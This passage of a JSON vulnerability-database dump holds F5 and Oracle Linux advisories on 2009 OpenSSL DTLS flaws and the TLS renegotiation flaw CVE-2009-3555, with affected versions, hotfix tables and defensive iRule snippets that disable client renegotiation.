SSL ciphers supported on BIG-IP platforms (11.x)](<https://support.f5.com/csp/article/K13163>)\n * [K11444: SSL ciphers supported on BIG-IP platforms (10.x)](<https://support.f5.com/csp/article/K11444>)\n", "edition": 1, "reporter": "f5", "published": "2014-06-19T21:43:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "f5", "title": "OpenSSL DTLS Buffer vulnerability CVE-2009-1387", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1387"], "modified": "2016-01-09T02:18:00", "href": "https://support.f5.com/csp/article/K15348", "id": "F5:K15348", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:22:54", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended Action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "reporter": "f5", "published": "2014-06-25T00:00:00", "title": "SOL15366 - OpenSSL DTLS vulnerability CVE-2009-1377", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1377"], "modified": "2014-06-25T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15366.html", "id": "SOL15366", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:14", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "reporter": "f5", "published": "2014-06-19T00:00:00", "title": "SOL15359 - OpenSSL vulnerability CVE-2009-1378", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1378"], "modified": "2016-07-25T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15359.html", "id": "SOL15359", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:06", "references": ["https://support.f5.com/kb/en-us/solutions/public/10000/300/sol10322.html", "https://support.f5.com/kb/en-us/solutions/public/11000/400/sol11444.html", "https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13163.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/6000/600/sol6664.html", "https://support.f5.com/kb/en-us/solutions/public/9000/500/sol9502.html", "https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13123", "https://support.f5.com/kb/en-us/solutions/public/12000/700/sol12766.html", "https://support.f5.com/kb/en-us/solutions/public/10000/900/sol10942.html", "https://support.f5.com/kb/en-us/solutions/public/10000/000/sol10025.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/3000/400/sol3430.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists. \n \nF5 is responding to this vulnerability as determined by the parameters defined in SOL4602: Overview of the F5 security vulnerability response policy. \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n * SOL11444: SSL ciphers supported on BIG-IP platforms (10.x)\n", "reporter": "f5", "published": "2014-06-19T00:00:00", "title": "SOL15348 - OpenSSL DTLS Buffer vulnerability CVE-2009-1387", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP PSM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway\n", "version": "10.2.4 HF11", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4 HF11", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4 HF11", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.4 HF11", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway\n", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4 HF11", "operator": "le"}, {"name": "BIG-IP AAM", "version": "10.2.4 HF11", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.4 HF11", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4 HF11", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.4 HF11", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.4 HF11", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.3.0", "operator": "le"}], "cvelist": ["CVE-2009-1387"], "modified": "2015-09-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15348.html", "id": "SOL15348", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:13", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "reporter": "f5", "published": "2014-06-19T00:00:00", "title": "SOL15351 - OpenSSL DTLS ChangeCipherSpec vulnerability CVE-2009-1386", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1386"], "modified": "2014-06-19T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15351.html", "id": "SOL15351", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:25", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "reporter": "f5", "published": "2014-06-19T00:00:00", "title": "SOL15355 - OpenSSL DTLS Buffer vulnerability CVE-2009-1379", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1379"], "modified": "2014-06-19T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15355.html", "id": "SOL15355", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-06-08T10:18:58", "references": [], "edition": 1, "description": "", "reporter": "f5", "published": "2009-11-06T03:00:00", "title": "SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "affectedSoftware": [{"name": "BIG-IP WebAccelerator", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP ASM", "version": "9.3.1", "operator": "le"}, {"name": "BIG-IP ASM", "version": "9.2.5", "operator": "le"}, {"name": "FirePass", "version": "6.0.3", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "9.4.8", "operator": "le"}, {"name": "FirePass", "version": "4.1.1", "operator": "le"}, {"name": "BIG-IP LTM", "version": "9.3.1", "operator": "le"}, {"name": "BIG-IP LTM", "version": "9.1.3", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.0.1", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.0.1", "operator": "le"}, {"name": "FirePass", "version": "5.4.2", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.1.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.1.0", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "9.4.8", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.1.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.2", "operator": "le"}, {"name": "ARX", "version": "5.2.2", "operator": "le"}, {"name": "FirePass", "version": "6.1.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.2", "operator": "le"}, {"name": "FirePass", "version": "5.5.2", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "9.2.5", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.1.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "9.3.1", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "9.3.1", "operator": "le"}, {"name": "Enterprise Manager", "version": "2.3.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.1.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.0.1", "operator": "le"}, {"name": "Enterprise Manager", "version": "1.8.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP GTM", "version": "9.4.8", "operator": "le"}, {"name": "BIG-IP ASM", "version": "9.4.8", "operator": "le"}, {"name": "BIG-IP LTM", "version": "9.4.8", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.0.1", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.0.1", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.0.1", "operator": "le"}, {"name": "ARX", "version": "6.1.1", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.1.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.1.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.1.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.0.1", "operator": "le"}, {"name": "FirePass", "version": "3.1.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "9.2.5", "operator": "le"}, {"name": "BIG-IP LTM", "version": "9.6.1", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP PSM", "version": "9.4.8", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.1.0", "operator": "le"}, {"name": "ARX", "version": "5.3.1", "operator": "le"}, {"name": "BIG-IP GTM", "version": "9.2.5", "operator": "le"}], "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "modified": "2017-03-14T22:05:00", "id": "F5:K10737", "href": "https://support.f5.com/csp/article/K10737", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-05-30T21:02:08", "references": [], "edition": 1, "description": "A Man in the Middle attack allows an attacker to inject an arbitrary amount of chosen plain text into the application protocol stream data during a secure session renegotiation that uses SSL version 3.x or TLS version 1.x. This may provide an attacker the ability to perform arbitrary actions on affected websites with user's credentials. This vulnerability does not allow one to decrypt the intercepted network communication.\n\nInformation about this advisory is available at the following locations:\n\n**Note**: These links take you to a resource outside of AskF5, and it is possible that the documents may be removed without our knowledge.\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555>\n\n**Note**: F5 thanks Marsh Ray, who originally identified and reported this vulnerability.\n\nThe IETF has adopted as [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>) a new extension to the TLS standard that addresses this issue. F5 Product Development has implemented this new extension beginning in BIG-IP versions 10.2.3 and 11.0.0.\n\n**Important**: When session renegotiation is disabled, some browsers may log an informational message that appears similar to the following example to the console, when connecting to F5 products:\n\nServer does not support RFC 5746, see CVE-2009-3555\n\nAlthough the message implies that the F5 product to which the browser is connecting is vulnerable to this attack, all vulnerable F5 Products have been patched to disable SSL/TLS renegotiation, and some have been further enhanced to allow explicit control over renegotiation, thus mitigating this attack. For more information regarding completed and planned updates related to this vulnerability, refer to the following table. Note that ID 223836 specifically addresses this error message.\n\nF5 Product Development is tracking this issue as follows:\n\nCR / ID | Description | Affected products | Included in \n---|---|---|--- \nCR132165 / \n \nID 213305 | Introduce the **&lt;disable|enable&gt;** parameter to the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command to control on a per-connection basis how TMM should respond to SSL 3.0/TLS 1.0 renegotiation requests. \n\n\n**Important**: Client-side session renegotiation is still enabled, by default, in versions prior to 10.1.0. In these versions, you must apply an iRule using the **SSL::renegotiate disable **command to each virtual server configuration you wish to protect from this vulnerability. Refer to the mitigation section, following, for more information.\n\n**Note**: For more information, refer to the DevCentral wiki page for the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command.\n\n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEngineering Hotfix available for: \nEnterprise Manager 1.8 \nCR132166 / \n \nID 213306 | Patch OpenSSL to disable midstream session renegotiation. This patch protects the Configuration utility and iControl against this vulnerability. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132167 / \n \nID 213307 | Enable midstream session renegotiation for the **big3d **and **gtmd**. This CR is a companion to CR132166, re-enabling mid-stream session renegotiation for the **big3d **and **gtmd** processes, which maintain long-lived iQuery-over-SSL connections that are renegotiated daily. These connections are mutually authenticated using 2-way SSL authentication prior to exchanging application traffic and, thus, are not vulnerable to the man-in-the-middle attacks described in this Solution. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132170 / \n \nID 213308 | Introduce a Client SSL / ServerSSL profile option to control whether midstream session renegotiation is allowed. In versions 10.1.0 - 10.2.2, the default setting for the Client SSL profile is **disabled**, and the default setting for the Server SSL profile is **enabled**. **Note**: BIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM | BIG-IP 10.1.0 and later \n \nCR132172 / \n \nID 223836 | Implement [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>), an extension to the TLS standard for secure midstream session renegotiation. **Note**: For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 10.2.3 \nBIG-IP 11.0.0 and later \n \nCR132177 / \nID 295760\n\nand\n\nCR132177-1 / \nID 294172\n\n| Patch OpenSSL to disable midstream session renegotiation. | FirePass | \n\nFirePass 7.0.0 and later \nFirePass 6.1.0 HF1 * \nFirePass 6.0.3 hotfix-132177-1 \nFirePass 6.0.2 hotfix-132177-1 \nFirePass 5.5.2 hotfix-132177-1 \nFirePass 5.5.1 hotfix-132177-1 \nFirePass 5.5 hotfix-132177-1 \n \nImportant: For version 6.1.0, the \nfix for this ID was not included in \nHF3 or HF4. Install the latest \ncumulative hotfix. \n \nID 37053 | Patch or upgrade Apache Tomcat to disable session renegotiation. | ARX | ARX 6.2.0 \n \n \nIf a named hotfix has been issued for your software version, you may download the referenced hotfix or later versions of the hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nIf an engineering hotfix has been issued for your software version, you should contact [F5 Technical Support](<http://www.f5.com/training-support/customer-support/contact/>), and reference this Solution number and the associated CR number to request the hotfix.\n\nFor a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of the F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nFor information about installing version 10.x hotfixes, refer to SOL10025: Managing BIG-IP product hotfixes (10.x).\n\n**Mitigation steps for BIG-IP LTM, ASM, PSM, Link Controller, WebAccelerator, or WOM SSL virtual servers**\n\nYou can use the Client SSL profile Renegotiation setting or an iRule to disable client-side session renegotiation for virtual servers. Refer to the following section that applies to your version:\n\n**Note**: Applications that require session renegotiation are inherently vulnerable to the attack. Only removal of the renegotiation requirement in the application itself will eliminate the vulnerability. If session renegotiation is disabled by any of the vulnerability mitigation steps described later, without modifying the application, client connections will be dropped. For example, IE 5.0 clients accessing applications which use SGC (Server Gated Cryptography) certificates are known to require renegotiation, and their connections would be disrupted by such a configuration.\n\n**Important**: Any mitigation action that re-enables session re-negotiation on patched vulnerable versions may re-expose your F5 system to this vulnerability. In some cases, iRule logic can be used to control this behavior. Refer to the following sections for details regarding your product and version.\n\n**BIG-IP versions 10.1.0 and later**\n\nBIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. SSL Renegotiation setting is **Enabled,** by default, in the SSL profiles, however, the system requires secure renegotiation of SSL connections. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension.\n\nIn BIG-IP version 10.1.0, the Renegotiation setting was added to the BIG-IP Client session and Server SSL profiles as a result of ID 213308 (formerly CR132180). In versions 10.1.0 - 10.2.2, the Renegotiation setting is **Disabled **by default in the Client SSL profile. Virtual servers using a Client SSL profile with the Renegotiation setting configured to **Disabled **are protected from this vulnerability.\n\nIf necessary, you can selectively enable renegotiation using the **SSL::renegotiate** iRules command on a virtual server that has renegotiation disabled in its Client SSL profile. For example, an iRule similar to the following enables renegotiation only for clients within a single Class C subnet:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nif { [IP::addr [IP::client_addr] equals 192.168.222.0/24] }{ \nSSL::renegotiate enable \n} \n}\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, and 10.1.0 through 10.2.x**\n\nTo mitigate the vulnerability, a BIG-IP system administrator may apply iRules similar to the following to each SSL virtual server. This sample iRule uses the **SSL::renegotiate** command to disable client-side session renegotiation, which prevents the BIG-IP system from processing a secondary session renegotiation request:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nSSL::renegotiate disable \n}\n\nThe **&lt;enable|disable&gt;**parameter was added to the **SSL::renegotiate** command in versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, 10.1.x, and 10.2.0 as a result of ID 213305 (formerly CR132165). In versions prior to 10.1.0, all virtual servers with a Client SSL profile applied will, by default, still accept session renegotiation.\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.4.x, 9.3.x prior to 9.3.1 HF8, and 10.0.x prior to 10.0.1 HF3**\n\nTo mitigate the vulnerability in versions that do not include the **SSL::renegotiate** command, apply an iRule similar to the following to each SSL virtual server. The iRule resets the connection if client-side SSL renegotiation is attempted.\n\nwhen CLIENT_ACCEPTED { \n# initialize TLS/SSL handshake count for this connection \nset sslhandshakecount 0 \n} \nwhen CLIENTSSL_HANDSHAKE priority 1 { \n# a handshake just occurred \nincr sslhandshakecount \n# is this the first handshake in this connection? \nif { $sslhandshakecount &gt; 1 } { \n# log (rate limited) the event (to /var/log/ltm) \nlog \"\\\\[VS [IP::local_addr]:[TCP::local_port] client [IP::remote_addr]:[TCP::remote_port]\\\\]:TLS/SSL renegotiation\" \n# if not, close the clientside connection \nreject \n} \n} \n\n\n**Note**: This example was provided by F5 DevCentral poster Lupo. The original post is available at the following location:\n\n[mitigating the TLS client-initiated renegotiation MITM attack](<http://devcentral.f5.com/Default.aspx?tabid=53&forumid=5&postid=86456&view=topic>)\n\nA separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n", "reporter": "f5", "published": "2009-11-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "SOL10737 - SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "modified": "2013-07-05T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/10000/700/sol10737.html", "id": "SOL10737", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:39:54", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "src", "packageFilename": "openssl-0.9.8e-12.el5.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "src", "packageFilename": "openssl-0.9.8e-12.el5.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "src", "packageFilename": "openssl-0.9.8e-12.el5.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "ia64", "packageFilename": "openssl-0.9.8e-12.el5.ia64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "x86_64", "packageFilename": "openssl-0.9.8e-12.el5.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "ia64", "packageFilename": "openssl-perl-0.9.8e-12.el5.ia64.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "ia64", "packageFilename": "openssl-devel-0.9.8e-12.el5.ia64.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i386", "packageFilename": "openssl-perl-0.9.8e-12.el5.i386.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i386", "packageFilename": "openssl-devel-0.9.8e-12.el5.i386.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i386", "packageFilename": "openssl-devel-0.9.8e-12.el5.i386.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "x86_64", "packageFilename": "openssl-devel-0.9.8e-12.el5.x86_64.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i686", "packageFilename": "openssl-0.9.8e-12.el5.i686.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i686", "packageFilename": "openssl-0.9.8e-12.el5.i686.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i686", "packageFilename": "openssl-0.9.8e-12.el5.i686.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i386", "packageFilename": "openssl-0.9.8e-12.el5.i386.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "x86_64", "packageFilename": "openssl-perl-0.9.8e-12.el5.x86_64.rpm", "packageName": "openssl-perl", "operator": "lt"}], "description": "[0.9.8e-12]\n- abort if selftests failed and random number generator is polled\n- mention EVP_aes and EVP_sha2xx routines in the manpages\n- add README.FIPS\n[0.9.8e-10]\n- fix CVE-2009-1386 CVE-2009-1387 (DTLS DoS problems)\n (#503685, #503688)\n[0.9.8e-9]\n- fix CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n (DTLS DoS problems) (#501253, #501254, #501572)\n[0.9.8e-8]\n- support multiple CRLs with same subject in a store (#457134)\n- fix CVE-2009-0590 - reject incorrectly encoded ASN.1 strings (#492304)\n- seed FIPS rng directly from kernel random device\n- do not require fipscheck to build the package (#475798)\n- call pairwise key tests in FIPS mode only (#479817)\n- do not crash when parsing bad mime data (#472440)", "edition": 3, "reporter": "Oracle", "published": "2009-09-08T00:00:00", "title": "openssl security, bug fix, and enhancement update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2006-7250", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "modified": "2009-09-08T00:00:00", "id": "ELSA-2009-1335", "href": "http://linux.oracle.com/errata/ELSA-2009-1335.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "redhat": [{"lastseen": "2017-09-09T07:19:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": 